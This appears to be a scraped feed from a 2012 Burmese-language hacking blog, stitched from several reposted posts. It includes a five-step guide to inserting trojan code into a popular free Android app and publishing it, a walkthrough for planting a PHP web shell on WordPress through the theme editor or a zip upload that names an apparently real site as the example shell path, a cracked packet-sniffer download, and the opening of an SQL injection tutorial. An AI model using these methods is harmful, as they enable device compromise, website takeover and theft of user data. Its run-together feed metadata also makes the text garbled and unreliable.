XSS vector is found inside source than site is vulnerable. It only uses
GET request to web server. NOTE: It will scan for XSS vector but it will
not test if alert or any other event really happened. <br />
3.<span style="color: red;"><span style="font-weight: bold;">Admin scanner </span></span>:
it scans for admin login locations , based on default list or any other
that you have supplied.Response code 200 and 306 is considered success.
<br />
4.<span style="color: red;"><span style="font-weight: bold;">Shared hosting scanner </span></span>: it send request to sameip.org and then parses html for pages<br />
<code><br /></code>
<code><span style="color: red;">shweko</span></code>shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-49123650004431412612012-09-01T05:39:00.000-07:002012-09-01T05:39:18.903-07:00How to get IPs on Steam (Multiple Packet Sniffers+CommView Crack)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE1F5Sv-U71yuXunAO1kCvpHTb22-ivZAWpQ8NFRaeGtZNxrjvqUrwCsBocRNqRA9NwVgwPHfC02bW2W7dhKaM6WhDafg2GdKt-xf-fluGhT8Do08I1K2ypinXljAfKoPhXyoEZ2s9njM/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE1F5Sv-U71yuXunAO1kCvpHTb22-ivZAWpQ8NFRaeGtZNxrjvqUrwCsBocRNqRA9NwVgwPHfC02bW2W7dhKaM6WhDafg2GdKt-xf-fluGhT8Do08I1K2ypinXljAfKoPhXyoEZ2s9njM/s1600/index.jpg" /></a></div>
<br />
HF ကရတဲ့ စာအုပ္ေလးပါ...။ေတာ္ေတာ္ေကာင္းတယ္ ...။ေရးထားတာရွင္းလင္းတယ္...။အသံုး၀င္မယ္ လို႕ထင္ပါတယ္...။အစကဘာသာျပန္မလို႕ပဲ မအားတာနဲ႕ ဒီအတိုင္းေလးပဲတင္ေပးလိုက္တာ...။<br />
<br />
<a href="http://www.mediafire.com/?xzf8uanzwkteudn">http://www.mediafire.com/?xzf8uanzwkteudn</a>shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-87087087923835246142012-09-01T05:19:00.002-07:002012-09-01T05:23:08.406-07:00Gtalk မွာ Group ဖြဲ႕ၿပီး ေျပာဖို႕ Party Chat လုပ္ၾကရေအာင္ <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://zawhlainghtun.files.wordpress.com/2012/01/12.jpg?w=215&h=87" /></span><br />
<br />
အုပ္စုဖြဲ႕ၿပီး Chat ၾကဖို႔အတြက္ကေတာ့ ပထမဦးဆံုး လုပ္ရမွာက <a class="bbc_url" href="http://partychapp.appspot.com/" rel="nofollow external" title="External link">http://partychapp.appspot.com/</a>
ဆိုတဲ့ လိပ္စာေလးကို အရင္ဦးဆံုးသြားလိုက္ပါ။ အဲဒီ ဆိုဒ္ေလး
ပြင့္လာၿပီဆိုတာနဲ႕ Sign in မွာ မိမိရဲ႕ Gmail account နဲ႔ ပဲ၀င္လိုက္ပါ။
အဲဒီေနာက္မွာေတာ့ ေအာက္မွာေပးးထားတဲ့ အတိုင္းလိုက္လုပ္လိုက္ပါေတာ့။<br />
<span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://zawhlainghtun.files.wordpress.com/2012/01/1.gif?w=332&h=220" /></span><br />
<br />
<br />
နံပါတ္တစ္လုပ္ရမွာက Room name လို႔ေပးထားတဲ့ ေနရာေလးမွာ မိမိစိတ္ႀကိဳက္ နာမည္ေလးတစ္ခုဖန္တီးပါ။ ဥပမာ name@partychatapp.app
spotchat.com ဆိုၿပီးေတာ့ေပါ့။ ၿပီးေတာ့ Room type မွာကေတာ့
ကိုယ္ႀကိဳက္ရာကို ေရြးခြင့္ရွိပါတယ္။ တစ္ခုသိထားရမွာက Invite only မွာက
ကိုယ္တိုင္ဖိတ္ေခၚ ခ်င္တဲ့သူေပါ့။ မဖိတ္ေခၚပဲနဲ႔ ၀င္လာလို႔မရဘူးေပါ့ေလ။
Open ကေတာ့ ကိုယ္ဖိတ္စရာမလိုဘူး ကိုယ့္ရဲ႕လိပ္စာကို သိရင္ ၀င္လာလို႕ရတယ္။
အဲလိုမ်ဳိးေပါ့။ Others to invite မွာေတာ့ ကိုယ္စၿပီး ဖန္တီးတဲ့အခါ
ကိုယ့္နာမည္ကို ထည့္ရိုက္ဖို႕လိုပါတယ္။ ကိုယ္ပိုင္အီးေမးလ္ကို
ရိုက္ရမွာေပါ့ေလ။ ၿပီးေတာ့ Create ကို ကလစ္ႏွိပ္လိုက္ရင္ ေအာက္မွာ
ေဖာ္ျပထားတဲ့ ပံုေလးေပၚလာလိမ္မယ္။<br />
<span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://zawhlainghtun.files.wordpress.com/2012/01/2.gif?w=630" /></span><br />
<br />
ၿပီးသြားတဲ့အခ်ိန္မွာေတာ့ သင့္ရဲ႕ Gtalk ထဲမွာ အခုလိုမ်ဳိးလာေပၚေနပါလိမ့္မယ္။<br />
<span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://zawhlainghtun.files.wordpress.com/2012/01/3.gif?w=630" /></span><br />
<br />
အဲဒီအခါ က်ရင္ သင္က yes လုပ္လိုက္ရုံေပါ့။ သင္ဖန္တီးခဲ့တဲ့
နာမည္ေတြနဲ႔ပဲလာေပၚပါလိမ့္မယ္။ အခုျပထားတာက နမူနာပံုေလးပါ။ ၿပီးရင္ေတာ့
သင့္ Gtalk ထဲမွာ အဲဒီ ဖန္တီးခဲ့တဲ့ နာမည္ေလးက အေရာင္ေလးလင္းေနပါလိမ့္မယ္။
အဲဒီေနာက္မွာေတာ့ သင္ဖိတ္ေခၚခ်င္တဲ့သူေတြကို ဖိတ္ေခၚႏိုင္ပါၿပီ။
အဲလိုဖိတ္ေခၚဖို႔အတြက္လည္း သင္က အခုေပးထားတဲ့ ပံုစံေတြအတိုင္းပဲ
ရိုက္ထည့္ရပါလိမ့္မယ္။ /invite name@gmail.com က သင္
ဖိတ္ေခၚခ်င္တဲ့သူအတြက္ပါ။ /list ကေတာ့ သင္နဲ႔အတူ ဘယ္ႏွစ္ေယာက္ရွိလဲဆိုတာ
ၾကည့္တာေပါ့။ ျပန္ထြက္ခ်င္ရင္ေတာ့ /exit ရိုက္လို႔လည္းရပါတယ္။ သင္ကလည္း
ထြက္သြားၿပီ သူလည္းထြက္သြားၿပီ ေနာက္ေန႔ ေတြ႕ ၾကတဲ့အခါမွာေတာ့
ျပန္လည္ၿပီးေတာ့ /invite name@gmail.com ကို ျပန္လည္ရိုက္ၿပီးေတာ့ ေခၚႏိုင္ပါတယ္။ အဆင္ေျပၾကပါေစ။ ေအာက္မွာေပးထားထာကေတာ့ မူရင္းဆိုဒ္က ရိုက္ပံုရိုက္နည္းေတြပါ။ <br />
<br />
/leave Leave this chat room. You can rejoin by sending another message
to the room. If the room is invite-only, you may need to be re-invited.<br />
/list See who is in the chat room.<br />
/alias newalias Change what name you show up as in the room.<br />
/inviteonly Toggle whether this room is invite only.<br />
/invite someemail Invite someone to the room.<br />
/me someaction Tell the room what you’re up to.<br />
If you type /me is rolling his eyes, everyone sees [youralias] is rolling his eyes.<br />
credit:zawhlainghtun<br />
<span style="color: red;">ref:MHU </span>shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com1tag:blogger.com,1999:blog-2967231180093766350.post-48982981287407875762012-09-01T05:11:00.003-07:002012-09-01T05:11:33.217-07:00[#][#][#] BHG မွ r00tcreat0r ၏ Buffero Overflow စာအုပ္ေလးပါ ~~~~~ <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-D-zZmZXXQe5JQrZMJmBWpvYYAvqQ696x1JIZAeXum7W4V_O8ht4y4iPREiJS8UFrfnEUea1JoTHctpZ2C1b4HUXD4Y2P1893b-OwdTMJr2rct0D3ce3SrUniu8r0_8QjuBpZQFL3G_s/s1600/211732225401MY_LOGO_OF_LIFE_AND_LOVE_by_hacker4hire.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-D-zZmZXXQe5JQrZMJmBWpvYYAvqQ696x1JIZAeXum7W4V_O8ht4y4iPREiJS8UFrfnEUea1JoTHctpZ2C1b4HUXD4Y2P1893b-OwdTMJr2rct0D3ce3SrUniu8r0_8QjuBpZQFL3G_s/s1600/211732225401MY_LOGO_OF_LIFE_AND_LOVE_by_hacker4hire.png" /></a></div>
<br />
<br />
<br />
<br />
<span class="bbc_underline"><strong class="bbc"><span style="color: red;">Download</span></strong></span><strong class="bbc"><span style="color: red;"> >>></span></strong> <a class="bbc_url" href="http://www.mediafire.com/?fbkdwqbc53khoav" rel="nofollow external" title="External link">http://www.mediafire...fbkdwqbc53khoav</a><br />
<br />
copy from MHU shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-2953899076482281912012-09-01T05:04:00.002-07:002012-09-01T05:05:15.805-07:00၀ိကိလိခ္ ၏ အတြင္းေရးမ်ား ( အပိုင္း ၁ မွ ၇ ) ထိ <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRYTDKElPQzx6YMXbFm7oV5Yw5iZrNx9V0j3N52l-QvlvoQz_k2Ketomm6C_yuJDKeoTcsqFtAfy6w45XJm7jyBiet2S8qmxlPNikfosvUUpRRkolv7inS9zqGlcgYm3wpkgzWeGItcvY/s1600/9780307951939.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRYTDKElPQzx6YMXbFm7oV5Yw5iZrNx9V0j3N52l-QvlvoQz_k2Ketomm6C_yuJDKeoTcsqFtAfy6w45XJm7jyBiet2S8qmxlPNikfosvUUpRRkolv7inS9zqGlcgYm3wpkgzWeGItcvY/s320/9780307951939.jpg" width="186" /></a></div>
<br />
၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို <b class="bbc"><span style="color: cyan;">Giacomo </span></b>
က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို
ဘာသာၿပန္ၿပီး တင္ေပးဖို႔ဆိုတာ ေတာ္ေတာ္ အားထည့္မွ ရတဲ႔ အလုပ္တစ္ခုပါ ...
အခန္း ( ၂၁ ) ခန္းရွိတာ ခုက ( ၁ ) ကေန (၇ ) ထိပါ အခန္း ( ၈ ) ေတာ႔
ၿပီးေနၿပီလို႔ ေၿပာပါတယ္ ။ တင္ထားတာေတာ႔ မေတြ႕မိေသးဘူး...
စိတ္၀င္စားဖို႔လည္း ေကာင္းသလို Internet Security နဲ႔ ပက္သက္ၿပီး ကမာကို
ကိုင္လွုပ္ခဲ႔တဲ႔ လူေတြ ၿဖစ္လို႔ ပိုၿပီး စိတ္၀င္စားဖို႔ ေကာင္းပါတယ္<br />
<br />
Download<br />
<a class="bbc_url" href="http://www.mediafire.com/?y34ckt9u6hvujyq" rel="nofollow external" title="External link"></a><br />
<pre class="prettyprint"><a class="bbc_url" href="http://www.mediafire.com/?y34ckt9u6hvujyq" rel="nofollow external" title="External link">http://www.mediafire.com/?y34ckt9u6hvujyq</a></pre>
<pre class="prettyprint"> </pre>
<pre class="prettyprint">ref:MHU </pre>
shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com1tag:blogger.com,1999:blog-2967231180093766350.post-10947011084905028792012-08-26T22:23:00.000-07:002012-08-26T22:23:06.342-07:00Creating Andriod Trojan in 5 steps <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipFaFAy5uXpu0o7FkHVb3ikaLO4OB5fnteJX93Luw4h4Q-SRurF5_fGrASxZoCV6_7Jb41WjvElUMETJC58Vqx9CGyaeojDiEokexnuuphmTczgAfIpoUGx4J2vKFeazhXgJJ11tAgt4k/s1600/android-trojan-300x298.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipFaFAy5uXpu0o7FkHVb3ikaLO4OB5fnteJX93Luw4h4Q-SRurF5_fGrASxZoCV6_7Jb41WjvElUMETJC58Vqx9CGyaeojDiEokexnuuphmTczgAfIpoUGx4J2vKFeazhXgJJ11tAgt4k/s1600/android-trojan-300x298.jpg" /></a></div>
<br />
Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။
Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os
ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့
ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို
ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္
Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။<br />
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္ <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" /> <br />
Technical Director for Security Reponse က Eric Chien က brand-new Trojan
တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။
စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္
ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ
ထြက္လာတာ <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" /> ။<span id="more-1272"></span><br />
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
<br />
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။<br />
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ
ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။
ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code
ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့
original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools
ေတြနဲ့ေျပာင္းလို့ရပါတယ္။<br />
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information
ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app
ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို
သံုးသြားပါတယ္။<br />
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder
ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္
run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး
ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app
ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။
(ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" /> )<br />
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။<br />
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။
လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market
မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo
ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" /> ။<br />
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့
၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware
ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial
လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး
ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။<br />
<br />
post by Fortran<br />
copy from Ghostarea.netshwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com2tag:blogger.com,1999:blog-2967231180093766350.post-23606663353653570442012-08-26T08:04:00.003-07:002012-08-26T08:04:42.011-07:00..:: How to upload shell via Wordpress ::..[2 methods] <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiofaKZoytviUjvh2fY-sC3P9jD2kcPTprYInO_WfIGwAkEG5PKtMXz8HKAskte-XUhL9fwC_z21NuoCYd6mm6uV_xnpM6S56oASEVuy2oVemvSPNcfMZuNCBP9PfgInAFq9mSfRPPVvpc/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiofaKZoytviUjvh2fY-sC3P9jD2kcPTprYInO_WfIGwAkEG5PKtMXz8HKAskte-XUhL9fwC_z21NuoCYd6mm6uV_xnpM6S56oASEVuy2oVemvSPNcfMZuNCBP9PfgInAFq9mSfRPPVvpc/s1600/images.jpg" /></a></div>
<br />
<br />
Wordpress ထဲကို ကိုယ္ရထားတဲ႔ username / password နဲ႔ login
၀င္ပါ...Dashboard ကိုေရာက္ပါလိမ္႔မယ္...ဘယ္ဘက္နားက appearance
ကိုႏွိပ္ပါ...editor ကိုဆက္ႏွိပ္ပါ...Select theme to edit ဆိုျပီး
ဒီလိုမ်ိဳးေလးျမင္ရပါလိမ္႔မယ္...ၾကိဳက္ႏွစ္သက္ရာ theme
ကုိထားလိုက္ပါ...ကၽြန္ေတာ္ကေတာ႔ url ေခၚရ လြယ္ကူရွင္းလင္းေအာင္ twentyten
ကိုပဲထားလိုက္ပါတယ္...select ကို
ႏွိပ္ပါ...ပံုေတာ႔နည္းနည္းေသးတယ္....သည္းခံၾကည္႔ဗ်ာ....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxhuuQd-OPXKPtayDewjxd4GWTQIDyo-bq3NIhLMaACd01jrLallj6lWE4e6SxUXeWk43PYgSeTSVilYu323SwVBSwbaMJExMA8pmMTUuFcJDdQ6RNNr5vkhL_1a8oyHoZ5zriPDkK6m8/s1600/wptuto.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxhuuQd-OPXKPtayDewjxd4GWTQIDyo-bq3NIhLMaACd01jrLallj6lWE4e6SxUXeWk43PYgSeTSVilYu323SwVBSwbaMJExMA8pmMTUuFcJDdQ6RNNr5vkhL_1a8oyHoZ5zriPDkK6m8/s1600/wptuto.jpg" /></a></div>
<br />
ျပီးရင္ ညာဘက္ျခမ္းနားက 404.php / sidebar.php / page.php စသည္ျဖင္႔ php
ေတြအမ်ားၾကီး ရွိပါတယ္...ၾကိဳက္ႏွစ္သက္ရာ php တစ္ခုကို click
လိုက္ပါ...edit box ထဲမွာ က်လာတဲ႔ သူ႔ရဲ႔ source code ကို shell ရဲ႔ source
code နဲ႔လဲျပီး update ကို ႏွိပ္လိုက္ပါ...wordpress ကို shell တင္ျခင္း
လုပ္ငန္းျပီးဆံုးပါျပီ....<br />
<br />
shell url ကိုေခၚပါမယ္...သူ႔ path က ဒီလိုပါ...<br />
<br style="color: red;" /><span style="color: red;">
www.site.com/wp-content/themes/themename/shellname.php</span><br />
<br />
<br />
ကဲ...shell ၀င္သြားပါျပီဗ်ာ...ဒါပါပဲ...ေနာက္နည္းေတြလည္း ရွိေသးတယ္ဗ်...ဒါေပမယ္႔ ဒါကေတာ႔ အေသခ်ာဆံုးနည္းပဲ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV9Iu21It4fb8DzEDEU5mxIrpktZr9JIHsqmUSFkrO0KL8H67At_Iwlqn2yLS16OMhc2wz3v-U00KcF1K4NYs-lCxaeh8bgNFq5v4E5cGhg1kxeJWLbqm_Cjweyd6UcImVasYepYQEVyw/s1600/wptuto1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV9Iu21It4fb8DzEDEU5mxIrpktZr9JIHsqmUSFkrO0KL8H67At_Iwlqn2yLS16OMhc2wz3v-U00KcF1K4NYs-lCxaeh8bgNFq5v4E5cGhg1kxeJWLbqm_Cjweyd6UcImVasYepYQEVyw/s1600/wptuto1.jpg" /></a></div>
<br />
<span style="color: yellow;">ေနာက္တစ္နည္း....</span><br />
ဒီနည္းကို တို႔အစ္ကိုၾကီးတုတ္ေကာက္ ျပထားတာပါ...<br />
<br />
<a class="bbc_url" href="http://www.site.com/wp-admin/theme-install.php" rel="nofollow external" title="External link">http://www.site.com/...eme-install.php</a> ဆိုတဲ႔အဲ path ကိုသြားပါ... upload option ေတြ႔ပါလိမ္႔မယ္...ႏွိပ္ျပီးေတာ႔ ေတြ႔တဲ႔ browse ကေန shell တင္ပါမယ္....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhds2BJr_Kt_cdqkSV9mOsZ3Xsq-mAqmRLGqPUQA39onkgnLVRk7lsKenviFq5euYy-sMxPUZr0N0Fj0C1Rk-bgwE-vSOF1GNowi8xwg1tiO_oGaG-kNuK6RmdQvYJXlXmVPTF0HXDvt6w/s1600/tuto.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhds2BJr_Kt_cdqkSV9mOsZ3Xsq-mAqmRLGqPUQA39onkgnLVRk7lsKenviFq5euYy-sMxPUZr0N0Fj0C1Rk-bgwE-vSOF1GNowi8xwg1tiO_oGaG-kNuK6RmdQvYJXlXmVPTF0HXDvt6w/s1600/tuto.jpg" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX_-9hxeKYVF1MWYEJMHFnR2uxbhLigypDUAUCY_avYyuu9rkXY9HRB11wcVtdQtET-WYoulpD4DHJY0QtvfQKsdplggJU56Kfz4vlyOWgfO1ijprMkJcyfU_IPH55UkP3qfZfv5eJgPQ/s1600/tuto1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX_-9hxeKYVF1MWYEJMHFnR2uxbhLigypDUAUCY_avYyuu9rkXY9HRB11wcVtdQtET-WYoulpD4DHJY0QtvfQKsdplggJU56Kfz4vlyOWgfO1ijprMkJcyfU_IPH55UkP3qfZfv5eJgPQ/s1600/tuto1.jpg" /></a></div>
<br />
<br />
ဒီမွာ မွတ္ထားရမွာက shell ကိုဒီအတိုင္း .php အေနနဲ႔ တင္လို႔မရပါဘူး....
.zip နဲ႔တင္မွရပါမယ္...ဒီေတာ႔ ကိုယ္တို႔ shell က ccc.php ဆိုပါစို႔......
.zip နဲ႔ ခ်ံဳ႔လိုက္ပါမယ္..... ccc.zip ေပါ႔.... အဲဒီ ccc.zip ကို upload
လုပ္ပါ.... .rar မဟုတ္ဘူးေနာ္... zip ... ေသခ်ာေျပာတယ္ေနာ္... .zip
လို႔....<br />
ိ<br />
တင္လိုက္တာရသြားရင္ ဒီလိုမ်ိဳးစာျပပါလိမ္႔မယ္....<br />
<br />
<br />
<pre class="prettyprint"><span class="typ">Unpacking</span><span class="pln"> the </span><span class="kwd">package</span><span class="pun">…</span><span class="pln">
</span><span class="typ">Installing</span><span class="pln"> the theme</span><span class="pun">…</span><span class="pln">
</span><span class="typ">Theme</span><span class="pln"> installed successfully</span><span class="pun">.</span></pre>
<br />
ဒါဆို shell ရသြားပါျပီ... <span rel="lightbox"></span><br />
မ်ားမ်ားမေျပာဘူး....သူ႔ shell path က ဒီလိုမ်ိဳးေလးျဖစ္ပါမယ္...မေမ႔ခ်င္ရင္ က်က္ထား... <span rel="lightbox"></span><br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.</span><span class="pln">site</span><span class="pun">.</span><span class="pln">com</span><span class="pun">/</span><span class="pln">wp</span><span class="pun">-</span><span class="pln">content</span><span class="pun">/</span><span class="pln">themes</span><span class="pun">/</span><span class="pln">ccc</span><span class="pun">/</span><span class="pln">ccc</span><span class="pun">.</span><span class="pln">php</span></pre>
<br />
ကၽြန္ေတာ္က 404.zip ကိုတင္လိုက္တယ္....ဒီေတာ႔ ကၽြန္ေတာ္႔ shell path က ဒီလိုျဖစ္သြားတာေပါ႔ဗ်ာ.... <span rel="lightbox"></span><br />
<pre class="prettyprint"><span class="pln">http</span><span class="pun">:</span><span class="com">//www.divinginsurance.org/wp-content/themes/404/404.php</span></pre>
<br />
<br />
<br />
copy from MHU<br /><span rel="lightbox"></span>shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-25407226028440911732012-08-26T07:33:00.001-07:002012-08-26T07:33:22.573-07:00[Tut]Error-Based SQL Injection[/Tut] <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-eGfsBtlF40S6XV61Zxd_F_kpWJUdEA5W3C6raL5QMfILHM6HvS7kL106kFWbbKznkbx4YNSkQ1OLcPsl0MD3YWC1HR3y5_p1FVGKKTDKw0fdv8o8sSB5JyVULmv0PbGQ_ba8XzOgvZ4/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-eGfsBtlF40S6XV61Zxd_F_kpWJUdEA5W3C6raL5QMfILHM6HvS7kL106kFWbbKznkbx4YNSkQ1OLcPsl0MD3YWC1HR3y5_p1FVGKKTDKw0fdv8o8sSB5JyVULmv0PbGQ_ba8XzOgvZ4/s1600/index.jpg" /></a></div>
<div class="bbc_center">
<br /></div>
<div class="bbc_center">
<br /></div>
<div class="bbc_center">
<span style="color: turquoise;"><span class="bbc_underline"><span style="font-size: 48px;"><span style="font-family: comic sans ms,cursive;">Error-Based SQL Injection</span></span></span></span></div>
<br />
<span style="color: lime;"><span style="font-size: 18px;">Content</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">1.Introduction</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">2.About</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">3.Version စစ္မယ္</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">4.Database စစ္မယ္</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">5.Table name ရွာမယ္</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">6.Column name ရွာမယ္</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">7.Harvestin Data</span></span><br />
<span style="color: lime;"><span style="font-size: 18px;">8.Conclusion</span></span><br />
<br />
<span style="font-size: 18px;"><span style="color: turquoise;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;">1.Introduction</span></span></span><br />
ဒီ...Error-based SQL injection အေၾကာင္းကုိဘယ္သူမွစတာမေတြ.ေသးလုိ. ဒီ Thread ေလးကုိဖြင့္ေပးလုိက္ပါတယ္...<br />
မွားတာေတြရွိေနရင္လည္း ၀င္းျပီးေထာက္ျပေဆြေႏြးေပးၾကပါ... <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br />
